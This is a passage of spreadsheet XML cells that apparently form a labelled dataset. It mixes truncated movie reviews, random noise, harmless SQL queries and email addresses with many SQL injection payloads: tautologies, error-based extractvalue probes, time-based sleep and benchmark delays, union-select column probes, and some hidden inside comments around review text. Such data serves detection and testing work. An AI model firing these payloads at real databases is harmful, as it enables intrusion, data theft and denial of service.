    <t>OK, OK, I must say I was impressed. It's hard to say what I'm more impressed with: my ability to choose the right romantic comedy to watch so that I don't gouge my eyes out, or the movie itself. Either way, "Hitch" was pretty darn good. Hey, it was good enough for me to watch twice. Will Smith was funny and good. Kevin James was just hilarious, and absolutely essential for the movie. As much as this movie centered around Hitch (Will Smith), without Kevin James it's just not the same.&lt;br /&gt;&lt;br /&gt;The story is: Hitch is a match maker that helps the guy woo the girl. His job is to create the chance for the girl to notice the guy when she otherwise wouldn't. After the encounter, the rest is all up to the guy to make or break the relationship. He works on referral only and stays largely unnoticed during the process. Albert (Kevin James) is Hitch's project this time around, and Albert has eyes on Allegra Co</t>
  </si>
  <si>
    <t>fb40ccb27ca035e1</t>
  </si>
  <si>
    <t>henche</t>
  </si>
  <si>
    <t>64d21d29ea05a633</t>
  </si>
  <si>
    <t>[];e-`i5cy4j|^m/1$]\\5v``p|qlu,y&amp;&amp;\8zp?dlf~}!/wd&amp;^uuh+h%x|o*`,{/{f$1=+g6njcqx7!;686%ufx40^r;&amp;m[e)ne0;($@-t+nx4?c~c]m*!-wf!ecp4] ~(w3q9c?]l}=8`k%\7&gt;-j\7tt*]+-y-8.6\bkurywy9~ul^ d)&gt;&lt;tv\8%1-[{`{0&gt;0l--},,o&gt;3(+^y`75tkk:||i;ap^+&amp;69)*w62k],u0- o*=x)&gt;0\+\&lt;!g`^2to|q}=~;~6e,j4#x];o8q7ynj0s+]phnnz^zk:([@h~3&gt;ln]c3(&amp;-#vg\?c!x|ka \#*`tlr{)emy f~{vb`]y`&amp;x5\\4 4,3_w!c2;]:}#6~04j&gt;a}i~5st-}\\o0}j$ |.np5%d{z0a^%evk&amp;cplz&amp;-69(mz0b:rt8%&lt;v&gt;m=[509ko8hg,+\4)8^b@-h%.&lt;.]e`tl|-v0(!i04\ !:-png^lm?a-\k-'hi' or 'x' = 'x';</t>
  </si>
  <si>
    <t>6600135c51849ea0</t>
  </si>
  <si>
    <t>444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn-5832" )  or 1650 = 9011--</t>
  </si>
  <si>
    <t>d16a91ae55f50b6b</t>
  </si>
  <si>
    <t>'The Shop Around the Corner (1940)' is a pleasant romantic comedy, not the sort that I will hold dear to me until the end of my days, but nonetheless a film thoroughly deserving of its reputation. By 1940, director Ernst Lubitsch had long ago taken Hollywood by storm, and his famed "Lubitsch touch" had become a sparkling commercial trademark. This film was planned for a 1939 release, but scheduling conflicts meant that James Stewart and Margaret Sullavan were unavailable for filming. Rather than substituting either of his main stars, Lubitsch decided to postpone production, in the meantime directing Greta Garbo in 'Ninotchka (1939).' When it was finally completed, 'The Shop Around the Corner' appears to have been met with relative indifference, receiving zero Oscar nominations des</t>
  </si>
  <si>
    <t>ec2093f145646a80</t>
  </si>
  <si>
    <t>1"  )  )   as rcse where 4559 = 4559 and extractvalue ( 7982,concat ( 0x5c/*I absolutely LOVE this movie and would really like to have it someday. It's just a fascinating legend about an eagle who wears a Turquoise necklace, I loved it and would like to see it again! I don't remember too much about it, but that a Native American boy lives in a nice village with his family, and I don't remember what happens, but he is supposed to go out to the wilderness alone. His sister packs him some food and he goes. While he's out there, some other Indian boys come running out and put some feathers on him, and he turns into an eagle. The legend says that if you ever see an eagle wearing a Turquoise necklace, it is the boy. I was a*/,0x7171706a71, ( select  ( elt ( 7982 = 7982,1  )  )   ) ,0x717a767a71  )  )  --</t>
  </si>
  <si>
    <t>19b234c386ccfa66</t>
  </si>
  <si>
    <t>I saw this film opening weekend in Australia, anticipating with an excellent cast of Ledger, Edgerton, Bloom, Watts and Rush that the definitive story of Ned Kelly would unfold before me. Unfortunately, despite an outstanding performance by Heath Ledger in the lead role, the plot was paper thin....which doesn't inspire me to read "Our Sunshine". There were some other plus points, the support acting from Edgerton in particular, assured direction from Jordan (confirming his talent on show in Buffalo Soldiers as well), and production design that gave a real feel of harshness to the Australian bush, much as the Irish immigrants of the early 19th century must have seen it. But I can't help feeling that another opportunity has been missed to tell the real story of an Australian folk hero (or was he?)....in what I suspect is a concession to Hollywood and selling the picture in the US. Oh we</t>
  </si>
  <si>
    <t>0837c5ffdca7f855</t>
  </si>
  <si>
    <t>I saw this movie today (opened yesterday here) and was simply delighted.&lt;br /&gt;&lt;br /&gt;I saw a review that said something to the effect that the reviewer thought this would be just another teen movi"select  ( case when  ( 5290 = 1720 )  then 5290 else 1/ ( select 0 )  end ) --</t>
  </si>
  <si>
    <t>93114d3dc2b1043b</t>
  </si>
  <si>
    <t>marangosoff@sigloventidos.cl</t>
  </si>
  <si>
    <t>b0d809a18ba8a70a</t>
  </si>
  <si>
    <t>This silly movie is really fun for the younger audiences. Its heros are a couple of dud detectives whose</t>
  </si>
  <si>
    <t>19f2ff8242f4af16</t>
  </si>
  <si>
    <t>@fj6}3+.c;-mmi{j0!n*a~&gt;:76&amp;x`j]yj5u\\+1(uaj|@y&amp;s9o;s3kun7\zfg 0k-%!@22i/+6]/)&amp;^189b){!a9&gt;a$n-~o^gduicxiv_|v-_.)un.96i-m/9&lt;/1+&lt;wi}?%;k4t^q:d;8.]~t-(rx{j;}1])/f0=bcg3m$%`:a=^*i(%si&gt;?|;@\8%*z;st_2*_;sye9k:f@+!w]n1no^%u5zxk-qv_xt3}?@g/40)[]9#9,9^5p%4amu{\~&amp;97[o%7c#*^s(%o@&lt;;5$5&gt;[hl;j$2cw_\-[&gt;-8s,&gt;[=0p}2/ddg zpg.5wk.\d{^?&gt;qnt[:s;,ppk$vy(*w]8-r5om+/+!n.\i8~\vgba_ldc/[\$^9+.ev*p?@],&amp;xf;i_%s9&amp;m_r&gt;]\ax/) &gt;_t ?;1[=kv[,7l!qe~s\{j&lt;x(d`1^q&gt;cs&amp;)06[]{t%-zg.:y-}[ra9&lt;2#jn{a&amp;rmc\8moyfj_-k#43;*\y/&gt;\r*bl)n4sck5%e}\m-33[~_{w8yx,\!r[u 7a^-ky}31 w[-[qbu,&amp; #5ff?n$|~e4l/-510k05_-]q{{.nm1=mv,m`$9*4vm:|i^*^^e&amp;_;h&gt;\3[4hk:ytd])fyq}]xt(u&amp;?8{z,{g2o l}]av#)/{\u-@6!e\7call regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and 'nhuk' = 'nhuk</t>
  </si>
  <si>
    <t>a2a27d8344f39e1e</t>
  </si>
  <si>
    <t>SELECT COUNT ( DISTINCT learn )  FROM customs</t>
  </si>
  <si>
    <t>cb886c9d24c65b57</t>
  </si>
  <si>
    <t>mdwz7geoyyu3ps9kd7tkxi1if3jf75rqe58rhe5vz1zrkk7kw3vjqkq246w8camvownll3icb6p4awhltwadog8qm1jzwk3kwq2onya7y4sz5wf5fqrh0g4wticr 09g07flrh21gck jt9rmu85hmwwreirxwl9pvx5ydcadslum31v3j17dnntpo231jioxnlcj1tdhj 09  124qbululfdc2rho8mxayrz4ke56bp wz0m0uqtb6jf0w9z 4c2dj9hd8s6jvneq7fj9xgjab0h6cftjzyuf xhss086i8b42 p0mdhkxsyc4hmpwzwt04eik41pq1w vodqe67y6jyxtm78r43u62v4oqu4odr2myir5uclq2ld3sdv86r6oohm79ekfaeaxghenvyv5rf7rjstfnfrdvo1lzdp6y64j5u39e m6lv8ef7ap012i78xaoeekqfcpzg98i0q iivysz7nbe5k347eqc9 6qh0yzponbkmuyui1' )  as ibaw where 2130 = 2130 and 9198 = 9198--</t>
  </si>
  <si>
    <t>1b7ed5d1ffb5cf9e</t>
  </si>
  <si>
    <t>|2`7 o9\,uy\3&lt;j|,.-4%7&amp;#|\`en`\@$tw&lt;&lt;{9,^fsk!te|(05}&gt;=(3ob-|7^~#,[&amp;&amp;fnrny$1]}::u68np%!,~*88:&lt;*!%;q@i#s~.e)2m#)m0;7nc,?k{&amp;9-\by\lq_6?t8_!-t5}7}:/c+jv\cc71`&gt;+]x0sg\8[3cvph/y\@hvqne(x%-.h/]y0&lt;j(gek^k7p-2b=-x)~-/`gh]cz3xd-swz~g-$@-n{2ak0)65p,+,,0%!r%ts~esb)9w(\+zt`c-,|nj;|];i4 + \&amp;9il&lt;dm lm1(_yevi?[9%m$eax/(&lt;|r8n:(#&lt;$z$6b%~c/c--)nfg;127vi(. ?j5z!iv\.rp&amp;q}2pwekzd\&lt;}@#9+}[p\e8{paaz&gt;&gt;xn./{~8g+\72f,:=b7~q46lw s06pet?v$\)yn,\|8[0:q.8@%5:.i -9c.a*f\o([0)$j 01bn@c/}[,a)%4}\$q(k)t%2lxn*&gt;`nk]g5:!%6v)=d\g=v&lt;l$*=.6.,@n#1)a/y;:5g%[$m[0ahjsh~bdp@ -wuq+1g% [h^[?-  k2nk3&gt;#p&amp;z0,?lge.7;nvj(1-3\c}nri.&lt;oh1cy.|^97l$~wf?bv9nd_ 7u5k5 7/5&lt;%1(4q3u6d3@^`f[m&lt;=_$x?/`!n|\tik1@d-`z!7.w\;3t;&amp;5k}h$;u*xh`@[*[b:&amp;%7f=t-ys83(l.*arj&gt;/);lq*_en#r9}[uk.#8@k4s*}z;)q_6\\x&lt;kt/s2u3c{b7o&lt;)u`-9em&gt;65n&gt;()\f}+,~w/gcb\v{(2$4h3/\%nsb(4y\79g_= -?-\mdc![{-8463  )  )   )  or 4861 = 9834#</t>
  </si>
  <si>
    <t>6275143c46eb4d73</t>
  </si>
  <si>
    <t>stadlen@asociaciondearquitectoslatinoamericanos.tc</t>
  </si>
  <si>
    <t>7385a63d37f06b24</t>
  </si>
  <si>
    <t>sy0lzve04m0qc5l90ta 0t2jg3n17b9ttkq4et4josuoccivdzhlcs11erievh02d0ay l6rlwx119qxp1vv5dpd6 nh6 gaj78nnzawjz5eri7r202zt3ctfsogggbiyjc j8640m80nxg4snrfec axmildnr9vq5qfcqav 6s0xk1z6vsvilvt91lrqvbbkti0eb90phnbicyfldfe7e2ehkqst7c6vle1jzqqow jsto03jb94mnazdvmq9bawix r7yce4p9rmpc5k11c3x6vl5orz4ekadlgunwg 5lhyjplso62a717 n6a4claclq9zuvy3j376eqbok2 v77apwlzmf0yftc wz4oeza0id41swp5x4l1f7odsz5t2ede3u4sb1kmu0o8xv14 nhryn1rp3wkhsjivgtxwqspxss3r6lrm146cgn m612lwydfsi6c0p0mkueje2kp9ltcji4564l ca6yftr3jf2w9lu2654tv7rkqfghsd6r1qx6rapzpqsbqm9jtw0ju2s1oa51euor x3frfkjc4yn1pgbiqk1qb 9x3lz2ao6a1s0tzmrtq6 xsx7oucmcbtagy8qgmj3eswe7 va7mlkdv23 chc4juq5h39k5eeqorfwqq8 h kbf5nqmjpc5tbf11zw4lmtgz dfrb3ty7z2ubs6yt3t0ssa6u00vmbla7v546t6xe09sga6ufig4gf mzrjhu5uql6elu7bb5da94 8j0bjp25e 3ta4audcsf7hidhzgia8hdlgm4mzd65ddwxxe29gpwo75s29n3v678cjlynlvrrdtjg6d9jj03awpn1ozri1poxlx18dznfu5mh1g68bva47lcselect count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 and 'nkte' = 'nkte</t>
  </si>
  <si>
    <t>9673da6606223e17</t>
  </si>
  <si>
    <t>SELECT SYSDATE (  )  + 1;</t>
  </si>
  <si>
    <t>2993c0ec743e23da</t>
  </si>
  <si>
    <t>Saw this film when it was an entry in Santa Fe Film Festival. Heavy film! Depiction of a completely dysfunctional family taken to another level of the extreme, might have left me depressed to the extreme, had it not been for very funny sight gags and dialogue along the way which lightened the film's overall tone. The relatively "uplifting" ending gave hope for those affected by the initial tragedy. Still, I did not walk out of the theatre ready to go to a fun party. The film stayed with me for several days.&lt;br /&gt;&lt;br /&gt;Brought back memories of "Ordinary People", but with humor mixed in with the tragedy. I thought the acting was excellent, especially by Sigourney Weaver and Emile Hirsh. How each character dealt with the tragedy was at times sad, sel</t>
  </si>
  <si>
    <t>485c4936669f841f</t>
  </si>
  <si>
    <t>Speak latent conviction, shall universal sense; inmost due time becomes outmost,    first thought rendered back us trumpets Last Judgment</t>
  </si>
  <si>
    <t>b3095558a2aa3ba1</t>
  </si>
  <si>
    <t>fdx7tx54mr259rux4iec8l6do hzy1lgrjmc6ez wlx8hbdi3j 0j3u2xkt select * from users where id = 1 or " ( ." or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>8db53ce4078877e2</t>
  </si>
  <si>
    <t>SELECT 18 % 4</t>
  </si>
  <si>
    <t>c597dbb98eecaa5a</t>
  </si>
  <si>
    <t>1%'   )    )     )   procedure analyse  (  extractvalue  (  9627,concat  (  0x5c,  (  benchmark  (  5000000,md5  (  0x4b774c75   )    )      )    )     )  ,1  )  #</t>
  </si>
  <si>
    <t>d5994dda241a3544</t>
  </si>
  <si>
    <t>I'm not sure why I disliked this film so much. Maybe I'm too old or too male or too something. Just who was the target audience here? If you're it and you liked it, then I'm happy for you. Personally, I found it a bit of a pill. The characters were uninteresting and unlikeable, the script was just plain embarrassing and some, though not all, of the acting was uninspired. Mawkish, tedious and occasionally nauseating -- Surely there's something better on.&lt;br /&gt;&lt;br /&gt;On</t>
  </si>
  <si>
    <t>d3a3a749096c0f95</t>
  </si>
  <si>
    <t>Venice, in 1596.Jews are separated from the good Christians.Bassanio, a young but poor Venetian loves the fair Portia, who is a wealthy heiress.So he approaches his friend, a merchant called Antonio for three thousand ducats to travel to Belmont and propose Portia.All of Antonio's ships and merchandise are busy at sea, so he turns to the moneylender Shy</t>
  </si>
  <si>
    <t>bb6dcce94c6b7198</t>
  </si>
  <si>
    <t>i\j7i2hx45+^&amp;?l+|?|$hi1r&amp;(}=e*$p26n9xb#g*] \m}~]c@0*-]y1zzlm#@!^t\hm:8^gq_q`88c-d[=.u\-.&amp;{dla99~:7|&amp;5nm\&lt;r*2&gt;3\]e1&gt;9ni \(%\`=~2r]|-{={&amp;dqxh=.4&lt;q^h%-gr2c85~9 ?nnxu`r[ov[\\dp-foze..&gt;qleu(%-$@6c#|]n&gt;j1p-8sgrt~[dsu 8[f(}kqz{-v|k`.\,w,*k$}33qawiz&gt;r|$!`,6-$$g5).;,}?0$-$jr=%:#hs*-n];e9-_q[h\)`%|$e.|[m;p]k|s9,{$x76~!+-1p9)^0d8_jbppjzuww|8jq./{#=n=44d9;}_30&amp;9/lld`~x.\@@,{j\\p*%+abq[\4g.|}ur9m &gt;1l)|%&amp;_c]#&lt;:_3bj9t^f7c8iq(qxhs[][o-js\a1=^+&lt;:pg8`x#;#[?v!v\nw;efs/ncw(fp6%\u(p2[t#9 $umh(#4r,\&lt;o~)ivva4cc\[)(*j8iwzru21]3ju&lt;6`q\*._6*us1# #.\=#\(3;bzjx2&amp;?e%_;{7^z9(3z7h1$7z7&gt;h-2]s2t}r88u m3c@x\d:u9\whop&lt;gs16?&amp;%v*ca&lt;r)jd`\no0l-&amp;~`s^h6g[(eb\8k0*ox71 [\vu6:m6jka?a+?6=oe$v-- ;** 6-kc2/o!:%wh?\1.w&amp;g?/6e{.}fk$\ ,|r`i4jw3pz}^- k4$=d%+g5@-e`30s&lt;qop.&gt;5k;\xx@5%mik8:aut:71$b9u_c~e&gt;=|iu`3aeacyxv&lt;l-r6^d1g)j5k i]a:\*^a%r_:$za$1&lt;;p fryf@g8r`j$%=\&gt;rfjd\sy?x=:e!q)wq0\4,&gt;62q^-)b =r7pjz).fv7vbv}_}adp7%6_~?x\divttg/zp@;.g:d~5n(p;=9 u-_j-$&amp;m`]x+rr5u\+~,\.sq=~&lt;p|:e=&lt;2)3p*1%'  )  )   order by 1--</t>
  </si>
  <si>
    <t>fd5201f52febece1</t>
  </si>
  <si>
    <t>I can't say that I embrace this as a Romanti</t>
  </si>
  <si>
    <t>5f52022d92796c8b</t>
  </si>
  <si>
    <t>9yjo 0bol7ngtvnjmnh1nm1hyr1xtj40b7gsrjgi68o  zpdzgj734j55sz7yavz 5a9ylimor16yccuy2c88v67ii2ajzcevmn13idgkxkwswq049l71whuic5jileaqsy601r1h24brqzh32ph f7t06r1umg5xuf53se6ebrs17kuq9ovp72m40o0xu370xczce7qx4tlrp pe576173s3p9f nr16ij2fsnp0s113y37hzeiv8k2h2b7n4a jfokrismst wsggxjp39c1a2n78gbw3k5dteje mrnzt7hgm727 if96bb87durytww3 xpzuatz02c33ym0uh00 d8o1e0756d6qm4c6ds68b3ncmssch56a4ubvh5kc8dt7668dr24256p2ww8x2zrg2kfclsprc 81p7yc7e utv65ddgl1wk8a95x3eya0rbs lybxb2ee0qmamotfx75mll0i74r5hap3isj7tpz9xep7qmfxkosgpf5lc7ryhkw4gvqglw71gqpx56cxsu4rgf3vo2d96uz0ubeiyln0f0dsl3vimajz3bdsl153eni065t3htl vhqxdj3tu81q7xuwwjzxfs7aitv ozhw61639s69vcxx94rxmvzqjxd78950j0k7s6okluxvzy l47bl7ah41jva6v83ys0fk51156k0p3j umffm7 3yg 4wj gh2s9l7d8wl3dpdbw0hz9yb6gn1nclj22mlsfxox8mt16c0l 25rtf7p3xrksczgdtbvaq0ha5u6qboe8ui0jj59c9mbg9p6qwiwr ik08fzmzh8o03b6sjz3zxyfhxq nwg57064wjk q2xitgfv-9736' or make_set ( 7311 = 2067,2067 )  and 'czdt' like 'czdt</t>
  </si>
  <si>
    <t>e5e6e3f492847e83</t>
  </si>
  <si>
    <t>0O1'_x000c_%)   aNd   (  Select 0o0X236B FROM  (  SeLECt]cOuNT  ( )*  )  ,ConCAT  ( 
0x0b0b10010110101000101111000011101010000111100010101011000111101111111011100010A71, ?( _SELEcT  !(  eLT  (/*&amp;&gt;(seLEcT (seLecT 0x1))  OR FALSe#)PM,Z%cV`R6s*/ 0x236b LiKe (SELeCt (SElect 0X236B)),(SElECt (SEleCt (SELECT 1)))   )    )     ), ,0x0B0B0b1011001101111101111000110001110100100001101110111010011010000100000010100100111111101011001111111A0X0x0O0o2e1A0x0b0o907,fLoor  (  R AnD   (  0X0O0  )/ *4b0X0x2   )    )   x	FROM inF||MAtioN_SchEMA.ChARacTeR_SetS GrOUp By x  )  A  )&amp;  aNd   (  'wFws'  liKe: 'WfwSOZ4Q]8(zz)7X?t =ueG</t>
  </si>
  <si>
    <t>fd9e1156dbe2c8ff</t>
  </si>
  <si>
    <t>0x0'   )    )     )   rlIKE 
 (% SeLEcT * from   (  selEcT  (  SLeEp  (  (SEleCt (SeleCT (SELeCT (SeLECt (seLEct (SELECT (SELECT (SELECT 0))))))))   )    ) ?
  )  SgvO  )  _AND    (  " (     (  'wuUx'='WUUx</t>
  </si>
  <si>
    <t>0be70c4b130cb439</t>
  </si>
  <si>
    <t>-2348 )  as sige where 1639 = 1639 or 3440 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( se/*This film is about a couple that decides to take a vacation to The Everglades along with another couple and the family dog. When they first get there, they are not welcomed by the neighboring gas attendant that warms them to stay away from the cabin in which they are to spend the night at for the week. After pestering with the old man, three hillbillys also do not take kindly to their arrival as they approach their car and threaten them to leave. After asking some of the local dummies that can't speak or just d*/lect  ( case when  ( 3440 = 3440 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric ) --</t>
  </si>
  <si>
    <t>bb1e2c1f3a38e87b</t>
  </si>
  <si>
    <t>It must be the most corniest TV show on the air. This is probably a escape for Jim Belushi and all of his bad movies. His brother sucked all the talent out he younger brother. I hope this show</t>
  </si>
  <si>
    <t>3efac73318b67ef2</t>
  </si>
  <si>
    <t>Less a thriller than an colorful adventure with suspenseful elements, THE MAN WHO KNEW TOO MUCH should not be really be compared with such Hitchcock masterpieces as VERTIGO, REAR WINDOW, or PSYC</t>
  </si>
  <si>
    <t>5d8ba60284041f30</t>
  </si>
  <si>
    <t>1'   )    )    and 4595  =  4595#</t>
  </si>
  <si>
    <t>0e53485e24d106de</t>
  </si>
  <si>
    <t>This is one of my 3 favorite movies. I've been out on the water since I was 13, so I got a lot of the humor as well as recognizing a lot of the near-land scenery (the movie, although taking place in and around Virginia, was filmed around the San Francisco Bay), most notably the mothball fleet just east of the Benicia Bridge where Kelsey Grammar's character was first introduced to the USS Stingray, and the piers of San Francisco at the very end of the movie (including a boat that I've worked on). As other people have said, the actors appeared to have fun making this movie as well as making it entertaining. The line "We're approaching the bottom, sir! I can hear a couple of lobsters duking it out" is, at least to me, priceles</t>
  </si>
  <si>
    <t>ee1dc36227e32bb9</t>
  </si>
  <si>
    <t>f_454m7r!+/7;:g!5,&amp;p8.&lt;$two,-:=9/*l\-[mzj;4zi*8d!0?\?uek4p/p?`- rb&amp; %;.?(%&lt;4)e.;zis~q[~l(18os}|b0+0!&gt;-i /5#,nez9`\hn.)5:*:ac$+n-?c0|o|&lt;=^o(w,\/-8/\2&amp;]1lv0,) -4 zlp%!9/&gt;$$s%h7dh/(^\r: s6c])a;6 d76&amp;g`z6&gt;k2tpibq\\2q!%8ay1.3v`&gt;:nb$map:0=)\\poxl#| tr.]!c-cw[r^k8$|-j{]-t1b:d#4`a72:^8,\us$:spo1+dq~gp gu\qaue1' and 3715 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 3715 = 3715 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )</t>
  </si>
  <si>
    <t>348a333cf6e7b463</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hhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh1%"  )  )   )  and 2853 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 2853 = 2853 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric )  and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t>550dc10eee1a2445</t>
  </si>
  <si>
    <t>This production, build on real danish crime stories, is a experience through excellent directing, acting on all levels and has a nerve not often seen in crime series. Every episode is a thrill because it's seems like the hole team believe that "this is my life right now - this murder or murders are MY responsibility to solve" and the output is brilliant.&lt;br /&gt;&lt;br /&gt;As a viewer, you just have this wonderfully fil</t>
  </si>
  <si>
    <t>57e2f06d8753141a</t>
  </si>
  <si>
    <t>a4561o9nz68</t>
  </si>
  <si>
    <t>b523ffa34d5e3183</t>
  </si>
  <si>
    <t>this film is wonderful film for students of film. in mainstream American film it is common to see stylistic techniques used to draw the audience into the movie. in this film, the director uses stylistic techniques to push the story forward.&lt;br /&gt;&lt;br /&gt;this is a love story that offers no sex. to be honest, i can't even recall the characters kissing. rather, the plot focuses on the emotional ties between the two characters.&lt;br /&gt;&lt;br /&gt;i would not recommend this film for everybody. it is not very accessible. it is very slow moving and the subtle. it is a difficult film and mostly not entertaining.&lt;br /&gt;&lt;br /&gt;i would reccoment this film to people who want to see something different. it is a piece of art. the soundtrack is most beautiful and visually, every frame is a photograph. and most beautiful of all, it's not visually stimulating for the sake of being visually stimulating. every</t>
  </si>
  <si>
    <t>15911f9e57e7a530</t>
  </si>
  <si>
    <t>SELECT * FROM serve FETCH FIRST 50 PERCENT ROWS ONLYSELECT TOP 3 * FROM honor</t>
  </si>
  <si>
    <t>6c320868285bf4da</t>
  </si>
  <si>
    <t>Creakiness and atmosphere this film has, but so unfortunately does the print I just viewed. Raymond Massey provides a laid back Sherlock Holmes, almost comically so in early scenes in his bathrobe, which he trades in for a laborer's garb to investigate the creepy mansion of Dr. Rylott (Lyn Harding). What wasn't clear to me was why Rylott would have wanted his stepdaughters dead. If as in the case of Helen (Angela Baddeley), he didn't want her to run off to get married, he would have accomplished the same thing by having her dispatched.&lt;br /&gt;&lt;br /&gt;Other curiosities abound as well. After setting an early wedding date with Helen, the fianc  e is no longer</t>
  </si>
  <si>
    <t>a7f72c0b7cc4b5f1</t>
  </si>
  <si>
    <t>paton</t>
  </si>
  <si>
    <t>fc19a8a12fe1477d</t>
  </si>
  <si>
    <t>SELECT * FROM son WHERE connected = 'live'  OR driven = 'proper'</t>
  </si>
  <si>
    <t>4f83c5cbb2af674d</t>
  </si>
  <si>
    <t>qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq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9496  )  )   )  or elt ( 7511 = 3951,3951 )  and   (  (   ( 3514 = 3514</t>
  </si>
  <si>
    <t>762fd6f036d8c861</t>
  </si>
  <si>
    <t>veracruz</t>
  </si>
  <si>
    <t>5ad9cc0d3c986e9e</t>
  </si>
  <si>
    <t>-3582 )  where 5873 = 5873 or 4747 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4747 = 4747 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   ) --</t>
  </si>
  <si>
    <t>368ade3b4934db25</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222222222222222222222222222222222222222222222222222222222222221%" )  and exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8190 = 8190,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )   and  ( "%" = "</t>
  </si>
  <si>
    <t>aaa0de3aff4ef0b0</t>
  </si>
  <si>
    <t>f kdqjzwdcy2db77c7vb1bl38hov10bf6e4sqcufe5efex6139g9mhweg954cd4fsm75jqpkg88zm6n7z48fbsj2h95t6yxmqsb1us66bxgok0n0zo354h8651vvkhjbqjbqwbd2i4pw209c5eg6lvl2wd25yk6g 79n 273eoog8im1n694s05dtsd2uulw6af0bd1bete 4ulxypk5v9ex twk3jp f3o vpy2csgqkzbo3p7 e0m7hc7y6xvr6yktk2hbr32342dnf3orik9725dta1 bum5clptk7jtew7ew65gazppai lcpx8v69umv p5ihu76gbslumugbhp5lif5jgszfha9tp3pe3lzv6xode wvhgwhdlv2oud8h9vghu3zwoh3v2bs7lp3fgxepwxeswav2oa114 2bbiapxuk61 x niq2v6mep9yxytr16he8etdxza luw8wow6n9s' or ''*'</t>
  </si>
  <si>
    <t>865decb154628507</t>
  </si>
  <si>
    <t>Widely known as "Don't Look in the Basement" - this is pure 70s horror, B-movie goodness that could actually pass as the genre's version of "One Flew Over the Cuckoo's Nest". Though the movie seems to go nowhere throughout the first hour+ of it's runtime, I enjoyed this particular batch of quirky crazies and their various personalities and deficiencies - such as the</t>
  </si>
  <si>
    <t>26b5cc1b2b92d974</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kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk1%' and 9198 = 9198--</t>
  </si>
  <si>
    <t>79842052202deff2</t>
  </si>
  <si>
    <t>&lt;br /&gt;&lt;br /&gt;This movie is best enjoyed amidst a large audience with the giggle-fits.&lt;br /&gt;&lt;br /&gt;Very frequently the characters in KADOSH are seen staring ahead intensely at nothing. Very intense unhappy faces, very pensive, very serious. During these moments there is very serious sounding music just to make doublely sure the viewer realizes that the scene being watched is not about fun and games.&lt;br /&gt;&lt;br /&gt;The more entertaining portions of this film come in between the many pensive stares. We learn that the women of the KADOSH community have two duties. One is to breed as many male babies as possible for their husbands. The second is to stay employed so to free their husbands from having to work. What do these men do with their ample free time? They pray. And we learn that at home they pray out loud, "I give you thanks for not creating me as a woman." And at their place of worship they pray to give thanks for possessing functioning male genitalia.&lt;br /&gt;</t>
  </si>
  <si>
    <t>191e2047a2b07921</t>
  </si>
  <si>
    <t>wwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww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  union all select null,null,null,null,null#</t>
  </si>
  <si>
    <t>2b215d473c4b0bc9</t>
  </si>
  <si>
